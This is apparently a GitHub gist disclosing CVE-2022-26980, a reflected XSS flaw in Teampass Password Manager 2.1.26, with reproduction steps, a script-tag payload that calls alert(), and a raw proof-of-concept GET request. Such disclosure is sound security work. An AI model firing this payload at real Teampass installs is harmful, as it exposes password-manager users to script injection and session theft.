Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Vulnerability Type: Reflected Cross Site Scripting (XSS) Vulnerability
Vendor of Product: Teampass
Affected Product Code Base: Teampass Password Manager
Product Version: 2.1.26
Description: Teampass 2.1.26 allows reflected XSS via the index.php PATH_INFO
Attack Vectors: Someone must open a link for the Teampass Password Manager index page containing malicious payload
Attack Type: Remote
Payload: ><script>alert('rnpg')</script>"
Assigned CVE-ID: CVE-2022-26980
Discoverer: Raspina Net Pars Group (RNPG), Faegheh Saberi
Steps To Reproduce
1. Browse the Index Page of the Teampass Password Manager 2.1.26
2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim
Example: http://<address in which Teampass Password Manager is set up>/?"><script>alert('rnpg')</script>"
#PoC
GET /?"><script>alert('rnpg')</script>" HTTP/1.1
Host: <address in which Teampass Password Manager is set up>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment